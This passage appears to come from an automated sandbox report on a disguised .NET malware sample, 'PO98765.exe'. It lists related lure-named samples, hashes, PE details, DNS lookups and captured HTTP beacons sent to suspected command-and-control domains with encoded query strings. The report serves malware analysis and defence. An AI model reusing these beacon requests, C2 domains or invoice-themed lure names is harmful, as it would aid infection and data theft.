                                              EME_PO.39134.xlsxGet hashmaliciousBrowse
                                              • www.smartropeofficial.com/mz59/?VrGd-0=igsD6CIxfIdP/BmaDcqJRhdi7opbp9JZE0pffGSxnJfYzYphWR5FxPFRxokm8KQT47JnMg==&MDKtU=Jxotsl4pOvw
                                              Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                              • www.veryinteresthing.com/bg8v/?DXIXO=Ci+8b5yVi0HjeRDPketSQzJsjy9TvJsNh1v2CR5lKm1ZvVcQvafggDw5DTXIkkN2hOV2&Jt7=XPv4nH2h

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              www.edlasyarns.comPO987556.exeGet hashmaliciousBrowse
                                              • 160.122.150.218
                                              shops.myshopify.cominv.exeGet hashmaliciousBrowse
                                              • 23.227.38.74
                                              EME_PO.39134.xlsxGet hashmaliciousBrowse
                                              • 23.227.38.74
                                              Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                              • 23.227.38.74
                                              Swift Copy.exeGet hashmaliciousBrowse
                                              • 23.227.38.74
                                              Inv.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              CSq58hA6nO.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              New Order .xlsxGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              NQQWym075C.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              Order specs19.11.20.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              ORDER SPECIFITIONS.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              anthony.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              udtiZ6qM4s.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              qAOaubZNjB.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              uM0FDMSqE2.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              new file.exe.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              jrzlwOa0UC.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              PDF ICITIUS33BUD10307051120003475.exeGet hashmaliciousBrowse
                                              • 23.227.38.64
                                              HN1YzQ2L5v.exeGet hashmaliciousBrowse
                                              • 23.227.38.64

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CLAYERLIMITED-AS-APClayerLimitedHKhttps://www.zhongguohnks.comGet hashmaliciousBrowse
                                              • 155.159.255.154
                                              CSq58hA6nO.exeGet hashmaliciousBrowse
                                              • 160.122.148.234
                                              Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                              • 168.206.180.179
                                              NQQWym075C.exeGet hashmaliciousBrowse
                                              • 160.122.148.234
                                              ant.exeGet hashmaliciousBrowse
                                              • 160.122.149.206
                                              nass.exeGet hashmaliciousBrowse
                                              • 164.88.89.9
                                              new file.exe.exeGet hashmaliciousBrowse
                                              • 168.206.237.116
                                              Zahlung-06.11.20.exeGet hashmaliciousBrowse
                                              • 155.159.204.214
                                              7x7HROymud.exeGet hashmaliciousBrowse
                                              • 160.121.58.239
                                              PLAN ORDER DURAN.exeGet hashmaliciousBrowse
                                              • 160.121.180.19
                                              BANK TRANSFER SLIP.exeGet hashmaliciousBrowse
                                              • 155.159.33.54
                                              PO_7801.exeGet hashmaliciousBrowse
                                              • 164.88.101.212
                                              Payment Advice - Advice Ref[GLV824593835].exeGet hashmaliciousBrowse
                                              • 164.88.81.242
                                              New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                              • 168.206.49.204
                                              New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                              • 164.88.89.161
                                              New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                              • 164.88.89.161
                                              New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                              • 160.121.14.148
                                              New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                              • 164.88.89.161
                                              SecuriteInfo.com.Exploit.Siggen2.47709.12233.rtfGet hashmaliciousBrowse
                                              • 160.121.132.40
                                              mp0nMsMroT.exeGet hashmaliciousBrowse
                                              • 155.159.203.193
                                              GOOGLEUSBooking Confirmation.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              PI202009255687.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              VOMAXTRADING.docGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              ACCOUNT TEAM.pptGet hashmaliciousBrowse
                                              • 172.217.168.1
                                              purchase order.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              inv.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3DGet hashmaliciousBrowse
                                              • 172.217.168.84
                                              2020112395387_pdf.exeGet hashmaliciousBrowse
                                              • 35.246.6.109
                                              anthon.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              http://searchlf.comGet hashmaliciousBrowse
                                              • 74.125.128.154
                                              RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              https://www.canva.com/design/DAEOhhihuRE/ilbmdiYYv4SZabsnRUeaIQ/view?utm_content=DAEOhhihuRE&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                              • 74.125.128.157
                                              https://www.canva.com/design/DAEOiuhLwDM/BOj9WYGqioxJf6uGii9b8Q/view?utm_content=DAEOiuhLwDM&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                              • 172.217.168.34
                                              https://docs.google.com/document/d/e/2PACX-1vTkklFHE_qZt5bggVyzSlPIJpfBM78UhR9h5giojoPSOo0J_kMb27pVCxF_eQESVaFWkRLwKQoIVpE-/pubGet hashmaliciousBrowse
                                              • 74.125.128.155
                                              https://docs.google.com/forms/d/e/1FAIpQLSfvVCUvByTC7wIMNQsuALuu8sCIp5hXEtWabaZn5DsGltbkEg/viewformGet hashmaliciousBrowse
                                              • 216.58.215.225
                                              https://docs.google.com/forms/d/e/1FAIpQLSfvVCUvByTC7wIMNQsuALuu8sCIp5hXEtWabaZn5DsGltbkEg/viewformGet hashmaliciousBrowse
                                              • 172.217.168.34
                                              https://Index.potentialissue.xyz/?e=fake@fake.comGet hashmaliciousBrowse
                                              • 74.125.128.155
                                              https://omgzone.co.uk/Get hashmaliciousBrowse
                                              • 35.190.25.25
                                              http://yjjv.midlidl.com/indexGet hashmaliciousBrowse
                                              • 172.217.168.1
                                              CLOUDFLARENETUSAsyncClient.exeGet hashmaliciousBrowse
                                              • 104.24.126.89
                                              https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                              • 104.16.18.94
                                              inv.exeGet hashmaliciousBrowse
                                              • 23.227.38.74
                                              doc-6954.xlsGet hashmaliciousBrowse
                                              • 104.18.62.178
                                              CO R94-04________PDF.jarGet hashmaliciousBrowse
                                              • 104.20.23.46
                                              QQWUO898519.xlsGet hashmaliciousBrowse
                                              • 104.18.48.20
                                              2020112395387_pdf.exeGet hashmaliciousBrowse
                                              • 104.18.32.47
                                              CO R94-04________PDF.jarGet hashmaliciousBrowse
                                              • 104.20.23.46
                                              QQWUO898519.xlsGet hashmaliciousBrowse
                                              • 104.18.48.20
                                              anthon.exeGet hashmaliciousBrowse
                                              • 172.67.209.143
                                              Statement Of Account.exeGet hashmaliciousBrowse
                                              • 104.23.98.190
                                              http://searchlf.comGet hashmaliciousBrowse
                                              • 104.18.226.52
                                              instrument indenture_11.25.2020.docGet hashmaliciousBrowse
                                              • 104.27.140.32
                                              SecuriteInfo.com.Heur.18406.xlsGet hashmaliciousBrowse
                                              • 172.67.159.187
                                              SecuriteInfo.com.Heur.18406.xlsGet hashmaliciousBrowse
                                              • 104.28.23.244
                                              instrument indenture_11.25.2020.docGet hashmaliciousBrowse
                                              • 104.27.141.32
                                              Vessel details.docGet hashmaliciousBrowse
                                              • 162.159.135.233
                                              instrument indenture_11.25.2020.docGet hashmaliciousBrowse
                                              • 104.27.140.32
                                              adjure-11.20.docGet hashmaliciousBrowse
                                              • 104.27.145.245
                                              adjure.11.25.2020.docGet hashmaliciousBrowse
                                              • 104.24.123.45

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO98765.exe.log
                                              Process:C:\Users\user\Desktop\PO98765.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1406
                                              Entropy (8bit):5.341099307467139
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                              MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                              SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                              SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                              SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.3134929233666135
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:PO98765.exe
                                              File size:688128
                                              MD5:137ec800f9c49390f2f225ab22774443
                                              SHA1:2f3f1a1615b625cb1daf8d1e4a3eba208a89e30d
                                              SHA256:60263179eccb843c5aa38040ebd2483b29a3923a94987f006561488e5d0f1d96
                                              SHA512:41b84ea68ec7c2b9fd5205a1ce00fcbfbe03d82efb4ae7ca9030f643aae341ff32b23974a23db5f8c0fbb423b569e838c10da56f185cbf4e70f1c634e8b570ec
                                              SSDEEP:12288:WTrUNQIc2+gkNmZh18NVxQ6Ssz2UAP85zPvE:jlc2BNP6NVGRsI85LvE
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z._..............P..v..........N.... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4a944e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FBF5AE3 [Thu Nov 26 07:36:03 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa93fc0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x480.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xa74540xa7600False0.726912574683data7.32069962776IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0xaa0000x4800x600False0.309244791667data2.62722465362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0xaa0580x424data

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright Token Software 2014 - 2020 (GNU GPL)
                                              Assembly Version1.0.0.0
                                              InternalNameBfRf.exe
                                              FileVersion1.0.0.0
                                              CompanyNameToken Softwares
                                              LegalTrademarks
                                              CommentsManages the creation and activation of profiles in the X3 games created by Egosoft.
                                              ProductNameProfile Manager
                                              ProductVersion1.0.0.0
                                              FileDescriptionProfile Manager
                                              OriginalFilenameBfRf.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/26/20-09:57:21.714305TCP1201ATTACK-RESPONSES 403 Forbidden804970934.102.136.180192.168.2.4
                                              11/26/20-09:57:42.153271TCP1201ATTACK-RESPONSES 403 Forbidden804971223.227.38.74192.168.2.4

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 26, 2020 09:57:21.582588911 CET4970980192.168.2.434.102.136.180
                                              Nov 26, 2020 09:57:21.598923922 CET804970934.102.136.180192.168.2.4
                                              Nov 26, 2020 09:57:21.599069118 CET4970980192.168.2.434.102.136.180
                                              Nov 26, 2020 09:57:21.599386930 CET4970980192.168.2.434.102.136.180
                                              Nov 26, 2020 09:57:21.615598917 CET804970934.102.136.180192.168.2.4
                                              Nov 26, 2020 09:57:21.714304924 CET804970934.102.136.180192.168.2.4
                                              Nov 26, 2020 09:57:21.714354992 CET804970934.102.136.180192.168.2.4
                                              Nov 26, 2020 09:57:21.714684963 CET4970980192.168.2.434.102.136.180
                                              Nov 26, 2020 09:57:21.714863062 CET4970980192.168.2.434.102.136.180
                                              Nov 26, 2020 09:57:21.731035948 CET804970934.102.136.180192.168.2.4
                                              Nov 26, 2020 09:57:41.965548038 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:41.981944084 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:41.985135078 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:41.985487938 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:42.001837969 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153270960 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153326035 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153441906 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153491974 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153522015 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153549910 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153578997 CET804971223.227.38.74192.168.2.4
                                              Nov 26, 2020 09:57:42.153582096 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:42.153647900 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:42.153775930 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:57:42.154025078 CET4971280192.168.2.423.227.38.74
                                              Nov 26, 2020 09:58:02.675896883 CET4971580192.168.2.4160.122.150.218
                                              Nov 26, 2020 09:58:05.676021099 CET4971580192.168.2.4160.122.150.218
                                              Nov 26, 2020 09:58:11.676599026 CET4971580192.168.2.4160.122.150.218
                                              Nov 26, 2020 09:58:24.791840076 CET4971880192.168.2.4160.122.150.218
                                              Nov 26, 2020 09:58:27.803355932 CET4971880192.168.2.4160.122.150.218

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 26, 2020 09:56:46.876534939 CET4918253192.168.2.48.8.8.8
                                              Nov 26, 2020 09:56:46.903584957 CET53491828.8.8.8192.168.2.4
                                              Nov 26, 2020 09:56:53.255492926 CET5992053192.168.2.48.8.8.8
                                              Nov 26, 2020 09:56:53.282816887 CET53599208.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:21.534744024 CET5745853192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:21.574743986 CET53574588.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:22.688765049 CET5057953192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:22.715966940 CET53505798.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:24.885966063 CET5170353192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:24.912981987 CET53517038.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:41.923377037 CET6524853192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:41.963454962 CET53652488.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:51.821472883 CET5372353192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:51.848748922 CET53537238.8.8.8192.168.2.4
                                              Nov 26, 2020 09:57:52.637336016 CET6464653192.168.2.48.8.8.8
                                              Nov 26, 2020 09:57:52.664422989 CET53646468.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:02.332180977 CET6529853192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:02.674093962 CET53652988.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:05.489701033 CET5912353192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:05.516762972 CET53591238.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:18.561975956 CET5453153192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:18.589188099 CET53545318.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:24.445055008 CET4971453192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:24.787240982 CET53497148.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:25.697844028 CET5802853192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:25.753426075 CET53580288.8.8.8192.168.2.4
                                              Nov 26, 2020 09:58:30.835995913 CET5309753192.168.2.48.8.8.8
                                              Nov 26, 2020 09:58:30.863044977 CET53530978.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 26, 2020 09:57:21.534744024 CET192.168.2.48.8.8.80x6df1Standard query (0)www.westhighlandwaytours.comA (IP address)IN (0x0001)
                                              Nov 26, 2020 09:57:41.923377037 CET192.168.2.48.8.8.80xed31Standard query (0)www.bloochy.comA (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:02.332180977 CET192.168.2.48.8.8.80x4f61Standard query (0)www.edlasyarns.comA (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:24.445055008 CET192.168.2.48.8.8.80x19c1Standard query (0)www.edlasyarns.comA (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:25.697844028 CET192.168.2.48.8.8.80x149aStandard query (0)www.punebites.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 26, 2020 09:57:21.574743986 CET8.8.8.8192.168.2.40x6df1No error (0)www.westhighlandwaytours.comwesthighlandwaytours.comCNAME (Canonical name)IN (0x0001)
                                              Nov 26, 2020 09:57:21.574743986 CET8.8.8.8192.168.2.40x6df1No error (0)westhighlandwaytours.com34.102.136.180A (IP address)IN (0x0001)
                                              Nov 26, 2020 09:57:41.963454962 CET8.8.8.8192.168.2.40xed31No error (0)www.bloochy.combloochy.myshopify.comCNAME (Canonical name)IN (0x0001)
                                              Nov 26, 2020 09:57:41.963454962 CET8.8.8.8192.168.2.40xed31No error (0)bloochy.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                              Nov 26, 2020 09:57:41.963454962 CET8.8.8.8192.168.2.40xed31No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:02.674093962 CET8.8.8.8192.168.2.40x4f61No error (0)www.edlasyarns.com160.122.150.218A (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:24.787240982 CET8.8.8.8192.168.2.40x19c1No error (0)www.edlasyarns.com160.122.150.218A (IP address)IN (0x0001)
                                              Nov 26, 2020 09:58:25.753426075 CET8.8.8.8192.168.2.40x149aNo error (0)www.punebites.compunebites.comCNAME (Canonical name)IN (0x0001)
                                              Nov 26, 2020 09:58:25.753426075 CET8.8.8.8192.168.2.40x149aNo error (0)punebites.com81.19.215.15A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.westhighlandwaytours.com
                                              • www.bloochy.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44970934.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 26, 2020 09:57:21.599386930 CET24OUTGET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1
                                              Host: www.westhighlandwaytours.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 26, 2020 09:57:21.714304924 CET24INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Thu, 26 Nov 2020 08:57:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5fb7c9ca-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.44971223.227.38.7480C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
